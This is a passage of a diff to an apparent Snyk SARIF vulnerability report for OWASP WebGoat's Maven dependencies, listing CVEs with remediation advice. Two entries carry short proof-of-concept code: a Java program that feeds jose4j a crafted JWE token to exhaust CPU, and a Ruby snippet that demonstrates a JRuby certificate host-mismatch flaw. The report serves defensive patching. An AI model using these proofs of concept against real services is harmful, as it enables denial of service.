-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Memory Leak when the `learning-push` handler is configured with the default `maxAge` of `-1`. An attacker who can send normal HTTP requests may consume excessive memory.\r\n\r\n# Workaround\r\nThis vulnerability can be avoided by setting a value for `maxAge` that is not `-1`.\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.37.Final, 2.3.18.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/6b8e79c167ed57444ef6ea480316a5d64faf080b)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2274437)\n- [Red Hat Security Advisory](https://access.redhat.com/errata/RHSA-2024:4392)\n- [Vulnerable Code](https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java#L562)\n"
+              "description": {
+                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.5.7"
               },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-401",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.3,
-                "security-severity": "2.3"
-              }
-            },
+              "artifactChanges": [
+                {
+                  "artifactLocation": {
+                    "uri": "pom.xml"
+                  },
+                  "replacements": [
+                    {
+                      "deletedRegion": {
+                        "startLine": 1
+                      },
+                      "insertedContent": {
+                        "text": "org.springframework.boot:spring-boot-starter-validation@3.5.7"
+                      }
+                    }
+                  ]
+                }
+              ]
+            }
+          ]
+        },
+        {
+          "ruleId": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
+          "level": "warning",
+          "message": {
+            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a medium severity vulnerability."
+          },
+          "locations": [
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7707751",
-              "shortDescription": {
-                "text": "Medium severity - Race Condition vulnerability in io.undertow:undertow-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-7885) io.undertow:undertow-core@2.3.10.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Race Condition due to the reuse of the `StringBuilder` instance in the `ProxyProtocolReadListener` across multiple requests. An attacker can access data from previous requests or responses by exploiting the shared usage of the `StringBuilder`.\r\n\r\nThis vulnerability primarily results in errors and connection termination but creates a risk of data leakage in multi-request environments.\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.36.Final, 2.3.17.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/ce5182c37376982ef0abee34fce0d8c0aab0fab8)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/d0c82ba6d13fb03da83174641a37fe15990607a7)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2305290)\n"
+              "physicalLocation": {
+                "artifactLocation": {
+                  "uri": "pom.xml"
+                },
+                "region": {
+                  "startLine": 1
+                }
               },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-362",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6.9,
-                "security-severity": "6.9"
-              }
-            },
+              "logicalLocations": [
+                {
+                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.5.18"
+                }
+              ]
+            }
+          ]
+        },
+        {
+          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458",
+          "level": "error",
+          "message": {
+            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
+          },
+          "locations": [
             {
-              "id": "SNYK-JAVA-IOUNDERTOW-7984545",
-              "shortDescription": {
-                "text": "High severity - Denial of Service (DoS) vulnerability in io.undertow:undertow-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-1635) io.undertow:undertow-core@2.3.10.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) through the wildfly-http-client protocol, due to the `WriteTimeoutStreamSinkConduit` process. This vulnerability can be exploited by repeatedly opening and closing connections immediately, which triggers memory and file descriptor leaks.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.31.Final, 2.3.12.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/3cdb104e225f34547ce9fd6eb8799eb68e040f19)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/7d388c5aae9b82afb63f24e3b6a2044838dfb4de)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2264928)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2336)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-IOUNDERTOW-8383402",
-              "shortDescription": {
-                "text": "Critical severity - HTTP Request Smuggling vulnerability in io.undertow:undertow-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-4639) io.undertow:undertow-core@2.3.10.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: io.undertow:undertow-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final\n# Overview\n[io.undertow:undertow-core](https://mvnrepository.com/artifact/io.undertow/undertow-core) is a Java web server based on non-blocking IO.\n\nAffected versions of this package are vulnerable to HTTP Request Smuggling due to the interaction of quotation marks and delimiters in the `parseCookie()` function. An attacker can exfiltrate `HttpOnly` cookie values or smuggle extra cookie values.\n# Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.30.Final, 2.3.11.Final or higher.\n# References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/ea7ea2525d9acad0fcf8f3dfd4972f91394796ee)\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/f72b2ef8114ad11bf9add501f3fae0f7bbd12128)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2166022)\n- [Red Hat Issues](https://issues.redhat.com/browse/UNDERTOW-2342)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-444",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 9.1,
-                "security-severity": "9.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGAPACHECOMMONS-10734078",
-              "shortDescription": {
-                "text": "High severity - Uncontrolled Recursion vulnerability in org.apache.commons:commons-lang3"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-48924) org.apache.commons:commons-lang3@3.12.0"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.apache.commons:commons-lang3\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and org.apache.commons:commons-lang3@3.12.0\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.apache.commons:commons-lang3@3.12.0\n# Overview\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion via the `ClassUtils.getClass` function. An attacker can cause the application to terminate unexpectedly by providing excessively long input values.\n# Remediation\nUpgrade `org.apache.commons:commons-lang3` to version 3.18.0 or higher.\n# References\n- [Apache Pony Mail](https://lists.apache.org/thread/bgv0lpswokgol11tloxnjfzdl7yrc1g1)\n- [GitHub Commit](https://github.com/apache/commons-lang/commit/b424803abdb2bec818e4fbcb251ce031c22aca53)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-674",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.8,
-                "security-severity": "8.8"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGBITBUCKETBC-6139942",
-              "shortDescription": {
-                "text": "High severity - Denial of Service (DoS) vulnerability in org.bitbucket.b_c:jose4j"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-51775) org.bitbucket.b_c:jose4j@0.9.3"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.bitbucket.b_c:jose4j\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and org.bitbucket.b_c:jose4j@0.9.3\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.bitbucket.b_c:jose4j@0.9.3\n# Overview\n[org.bitbucket.b_c:jose4j](https://bitbucket.org/b_c/jose4j) is a robust and easy to use open source implementation of JSON Web Token (JWT) and the JOSE specification suite (JWS, JWE, and JWK). It is written in Java and relies solely on the JCA APIs for cryptography. Please see https://bitbucket.org/b_c/jose4j/wiki/Home for more info, examples, etc...\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large `p2c` (PBES2 Count) value. An attacker can cause the application to consume excessive CPU resources by supplying an unusually high PBES2 Count value.\n# PoC\n```java\r\n\r\nimport org.jose4j.jwa.AlgorithmConstraints;\r\nimport org.jose4j.jwe.ContentEncryptionAlgorithmIdentifiers;\r\nimport org.jose4j.jwe.JsonWebEncryption;\r\nimport org.jose4j.jwe.KeyManagementAlgorithmIdentifiers;\r\nimport org.jose4j.keys.AesKey;\r\nimport org.jose4j.lang.ByteUtil;\r\n\r\nimport java.security.Key;\r\n\r\npublic class jwt {\r\n    public static void main(String[] argc)throws Exception{\r\n        Key key = new AesKey(ByteUtil.randomBytes(16));\r\n        JsonWebEncryption jwe = new JsonWebEncryption();\r\n        jwe.setAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                KeyManagementAlgorithmIdentifiers.PBES2_HS256_A128KW));\r\n        jwe.setContentEncryptionAlgorithmConstraints(new AlgorithmConstraints(AlgorithmConstraints.ConstraintType.PERMIT,\r\n                ContentEncryptionAlgorithmIdentifiers.AES_128_CBC_HMAC_SHA_256));\r\n        jwe.setKey(key);\r\n        jwe.setCompactSerialization(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMTI4Q0JDLUhTMjU2IiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJ1RWxQUGhJLThGY2h3a1BhIn0=.JOIw8ccIdkor7-ZaHQz6pUkqj2VEL_XIuonOwdSrdeXxFb7qN8FZKw.1-ZgAG8KzCbl6wDjUzrsTw.0pLJ0ZEu9OMYV1jyfPIrqg.gFNkCEwB1lf_Jovc7ZOd5w\");\r\n        System.out.println(\"Payload: \" + jwe.getPayload());\r\n    }\r\n}\r\n\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.bitbucket.b_c:jose4j` to version 0.9.4 or higher.\n# References\n- [Bitbucket Commit](https://bitbucket.org/b_c/jose4j/commits/1afaa1e174b3)\n- [Bitbucket Issue](https://bitbucket.org/b_c/jose4j/issues/212)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.5,
-                "security-severity": "7.5"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGJBOSSXNIO-6403375",
-              "shortDescription": {
-                "text": "High severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in org.jboss.xnio:xnio-api"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-5685) org.jboss.xnio:xnio-api@3.8.8.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.jboss.xnio:xnio-api\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-undertow@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-undertow@3.1.5 › io.undertow:undertow-core@2.3.10.Final › org.jboss.xnio:xnio-api@3.8.8.Final\n# Overview\n[org.jboss.xnio:xnio-api](https://mvnrepository.com/artifact/org.jboss.xnio/xnio-api) is a simplified low-level I/O layer which can be used anywhere you are using NIO.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') due to the `NotifierState` function that can cause a Stack Overflow Exception when the chain of notifier states becomes problematically large, leading to a possible denial of service.\n# Remediation\nUpgrade `org.jboss.xnio:xnio-api` to version 3.5.10, 3.7.13, 3.8.14 or higher.\n# References\n- [GitHub Commit](https://github.com/xnio/xnio/commit/ffabdcdda508ef87aeadad5ca3f854e274d60ec1)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2241822)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.5,
-                "security-severity": "7.5"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGJRUBY-10074039",
-              "shortDescription": {
-                "text": "Medium severity - Improper Validation of Certificate with Host Mismatch vulnerability in org.jruby:jruby"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-46551) org.jruby:jruby@9.4.3.0"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.jruby:jruby\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.asciidoctor:asciidoctorj@2.5.10 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.asciidoctor:asciidoctorj@2.5.10 › org.jruby:jruby@9.4.3.0\n# Overview\n[org.jruby:jruby](https://www.jruby.org) is a high performance, stable, fully threaded Java implementation of the Ruby programming language.\n\nAffected versions of this package are vulnerable to Improper Validation of Certificate with Host Mismatch in the SSL certificate validation process. An attacker can intercept secure communications by presenting a valid certificate for an unrelated domain that the attacker controls.\r\n\r\n**Note:**\r\n\r\nThis is only exploitable if the attacker is in a \"man-in-the-middle\" (MITM) position before performing the attack.\n# PoC\n```\r\nrequire \"net/http\"\r\nrequire \"openssl\"\r\n\r\nuri   = URI(\"https://bad.substitutealert.com/\")\r\nhttps = Net::HTTP.new(uri.host, uri.port)\r\nhttps.use_ssl      = true\r\nhttps.verify_mode  = OpenSSL::SSL::VERIFY_PEER\r\n\r\nbody = https.start { https.get(uri.request_uri).body }\r\nputs body\r\n```\n# Remediation\nUpgrade `org.jruby:jruby` to version 9.4.12.1, 10.0.0.1 or higher.\n# References\n- [GitHub Commit](https://github.com/jruby/jruby-openssl/commit/b1fc5d645c0d90891b8865925ac1c15e3f15a055)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-297",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6,
-                "security-severity": "6.0"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGJRUBY-10557729",
-              "shortDescription": {
-                "text": "High severity - Memory Allocation with Excessive Size Value vulnerability in org.jruby:jruby-stdlib"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-43857) org.jruby:jruby-stdlib@9.4.3.0"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.jruby:jruby-stdlib\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.asciidoctor:asciidoctorj@2.5.10 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.asciidoctor:asciidoctorj@2.5.10 › org.jruby:jruby@9.4.3.0 › org.jruby:jruby-stdlib@9.4.3.0\n# Overview\n[org.jruby:jruby-stdlib](https://www.jruby.org/) is a JRuby Lib Setup package.\n\nAffected versions of this package are vulnerable to Memory Allocation with Excessive Size Value in the `ResponseReader` class. An attacker can cause the application to allocate excessive memory and trigger a denial of service by including \"literal\" strings in responses sent to client-initiated connections and IMAP commands. \r\n\r\nAfter implementing the fix, the default `max_response_size` is still high (512MiB) to accommodate backward compatibility. It is recommended to set a lower `max_response_size` if connecting to untrusted servers or using insecure connections.\n# Remediation\nA fix was pushed into the `master` branch but not yet published.\n# References\n- [GitHub Commit](https://github.com/ruby/net-imap/pull/444/commits/0ae8576c1a90bcd9573f81bdad4b4b824642d105#diff-53721cb4d9c3fb86b95cc8476ca2df90968ad8c481645220c607034399151462)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/442)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/445)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/446)\n- [GitHub PR](https://github.com/ruby/net-imap/pull/447)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2362749)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-789",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-10345766",
-              "shortDescription": {
-                "text": "Medium severity - HTTP Response Splitting vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-41234) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to HTTP Response Splitting via the `Content-Disposition` header where the `filename` parameter value could contain non-printable characters, causing parsing issues for HTTP clients. An attacker can cause the download of files containing malicious commands by injecting content into the response.\n\n**Notes:**\n\n1) This is only exploitable if the header is prepared with `org.springframework.http.ContentDisposition`, the filename is set via `ContentDisposition.Builder#filename(String, Charset)`, the value is derived from unsanitized user input, and the attacker can inject malicious content into the downloaded response.\n\n2) The vulnerability was also fixed in the 6.0.29 commercial version.\n# Remediation\nUpgrade `org.springframework:spring-web` to version 6.1.21, 6.2.8 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/f0e7b42704e6b33958f242d91bd690d6ef7ada9c)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/35034)\n- [Spring Security Advisory](https://spring.io/security/cve-2025-41234)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-113",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 4.5,
-                "security-severity": "4.5"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12008931",
-              "shortDescription": {
-                "text": "High severity - Relative Path Traversal vulnerability in org.springframework:spring-beans"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-41242) org.springframework:spring-beans@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-beans\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13 › org.springframework:spring-beans@6.0.13\n# Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Relative Path Traversal when deployed on non-compliant Servlet containers. An unauthenticated attacker could gain access to files and directories outside the intended web root.\r\n\r\n**Notes:**\r\n\r\n1) This is only exploitable if the application is deployed as a WAR or with an embedded Servlet container, the Servlet container does not reject suspicious sequences and the application serves static resources with Spring resource handling.\r\n\r\n2) Applications deployed on Apache Tomcat or Eclipse Jetty are not vulnerable, as long as default security features are not disabled in the configuration.\r\n\r\n3) This vulnerability was also fixed in the commercial versions 6.1.22 and 5.3.44.\n# Remediation\nUpgrade `org.springframework:spring-beans` to version 6.2.10 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/3781ba223ed76823b99e9c699e0957b391e22bf9)\n- [GitHub Release](https://github.com/spring-projects/spring-framework/releases/tag/v6.2.10)\n- [Spring Release](https://spring.io/blog/2025/08/14/spring-framework-6-2-10-release-fixes-cve-2025-41242)\n- [Vendor Advisory](https://spring.io/security/cve-2025-41242)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-23",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.2,
-                "security-severity": "8.2"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-12817817",
-              "shortDescription": {
-                "text": "High severity - Incorrect Authorization vulnerability in org.springframework:spring-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-41249) org.springframework:spring-core@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-test@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-test@3.1.5 › org.springframework:spring-core@6.0.13\n# Overview\n[org.springframework:spring-core](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22spring-core%22) is a core package within the spring-framework that contains multiple classes and utilities.\n\nAffected versions of this package are vulnerable to Incorrect Authorization via the `AnnotationsScanner` and `AnnotatedMethod` class. An attacker can gain unauthorized access to sensitive information by exploiting improper resolution of annotations on methods within type hierarchies that use parameterized supertypes with unbounded generics.\r\n\r\n**Note:**\r\nThis is only exploitable if security annotations are used on methods in generic superclasses or generic interfaces and the `@EnableMethodSecurity` feature is enabled.\n# Remediation\nUpgrade `org.springframework:spring-core` to version 6.2.11 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/6d710d482a6785b069e35022e81758953afc21ff)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/35342)\n- [GitHub Release](https://github.com/spring-projects/spring-framework/releases/tag/v6.2.11)\n- [Vendor Advisory](https://spring.io/security/cve-2025-41249)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-863",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.7,
-                "security-severity": "8.7"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6091650",
-              "shortDescription": {
-                "text": "Medium severity - Denial of Service (DoS) vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-34053) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework:spring-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-web@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-web@3.1.5 › org.springframework:spring-web@6.0.13\n# Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) when providing a specially crafted HTTP request. \r\n\r\nTo be vulnerable, these conditions must all be met (which is usually the case for applications dependent on `org.springframework.boot:spring-boot-actuator`): \r\n\r\n- The affected application uses Spring MVC or Spring WebFlux.\r\n\r\n- `io.micrometer:micrometer-core` is on the classpath.\r\n\r\n- An `ObservationRegistry` is configured in the application to record observations.\r\n\r\n# Workaround\r\n\r\nThis vulnerability can be avoided by disabling web observations: `management.metrics.enable.http.server.requests=false`\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `org.springframework:spring-web` to version 6.0.14 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/c18784678df489d06a70e54fcddb5e3821d4b00c)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-34053)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.3,
-                "security-severity": "5.3"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586",
-              "shortDescription": {
-                "text": "High severity - Open Redirect vulnerability in org.springframework:spring-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-22243) org.springframework:spring-web@6.0.13"
-              },
-              "help": {
-                "text": "",
